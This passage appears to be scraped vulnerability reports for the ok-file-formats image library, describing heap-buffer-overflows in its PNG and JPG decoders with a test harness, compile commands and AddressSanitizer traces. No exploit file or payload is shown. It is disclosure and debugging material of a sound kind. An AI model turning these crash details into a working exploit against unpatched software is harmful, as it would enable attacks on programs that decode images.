      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==8813==ABORTING
    

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_png\_transform\_scanline() at ok\_png.c:712:13.

**Poc**

Poc file is this.

CVE-2021-44339: heap-buffer-overflow in function ok_png_transform_scanline() at  ok_png.c:712:13  · Issue #15 · brackeen/ok-file-formats

David Brackeen ok-file-formats 97f78ca is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurs in function ok_jpg_convert_YCbCr_to_RGB() in "/ok_jpg.c:513" .

**Version**

dev version, git clone https://github.com/brackeen/ok-file-formats.git

**Environment**

Ubuntu 18.04, 64bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_jpg.h"
#include "ok\_jpg.c"
 
int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen("\_argv\[1\]", "rb");
    ok\_jpg image = ok\_jpg\_read(file, OK\_JPG\_COLOR\_FORMAT\_RGBA);
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

$ gcc -g -o main main.c ok\_jpg.h

Compile test program with address sanitizer with this command:

$ gcc -g -fsanitize=address -fno-omit-frame-pointer -O1 -o Asanjpg main.c ok\_jpg.h

**Result**

The result of running without ASAN:

$ ./main heap-buffer-overflow-2.jpg
double free or corruption (!prev)
Aborted

Information obtained by using ASAN:

$ ./Asanjpg heap-buffer-overflow-2.jpg
=================================================================
==3402==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000024c at pc 0x5632c5205ffb bp 0x7ffc939581c0 sp 0x7ffc939581b0
WRITE of size 1 at 0x63000000024c thread T0
    #0 0x5632c5205ffa in ok\_jpg\_convert\_YCbCr\_to\_RGB /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:513
    #1 0x5632c5205ffa in ok\_jpg\_convert\_data\_unit\_color /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:545
    #2 0x5632c5205ffa in ok\_jpg\_convert\_data\_unit /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:607
    #3 0x5632c5212c3d in ok\_jpg\_decode\_scan /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1276
    #4 0x5632c5212c3d in ok\_jpg\_read\_sos /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1742
    #5 0x5632c5212c3d in ok\_jpg\_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1930
    #6 0x5632c5212c3d in ok\_jpg\_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:2004
    #7 0x5632c52142dc in ok\_jpg\_read\_with\_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:268
    #8 0x5632c5214412 in ok\_jpg\_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:257
    #9 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10
    #10 0x7f0ab88adbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #11 0x5632c5203499 in \_start (/home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/Asanjpg+0x1499)

0x63000000024c is located 436 bytes to the left of 60000-byte region \[0x630000000400,0x63000000ee60)
allocated by thread T0 here:
    #0 0x7f0ab8d5bb40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5632c52037e1 in ok\_stdlib\_alloc /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:55
    #2 0x5632c520ed69 in ok\_jpg\_read\_sof /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1613
    #3 0x5632c520ed69 in ok\_jpg\_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1910
    #4 0x5632c520ed69 in ok\_jpg\_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:2004
    #5 0x5632c52142dc in ok\_jpg\_read\_with\_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:268
    #6 0x5632c5214412 in ok\_jpg\_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:257
    #7 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10
    #8 0x7f0ab88adbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:513 in ok\_jpg\_convert\_YCbCr\_to\_RGB
Shadow bytes around the buggy address:
  0x0c607fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c607fff8040: fa fa fa fa fa fa fa fa fa\[fa\]fa fa fa fa fa fa
  0x0c607fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==3402\==ABORTING

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_jpg\_convert\_YCbCr\_to\_RGB() at ok\_jpg.c:513

**Poc**

Poc file is this.

Tag

#ubuntu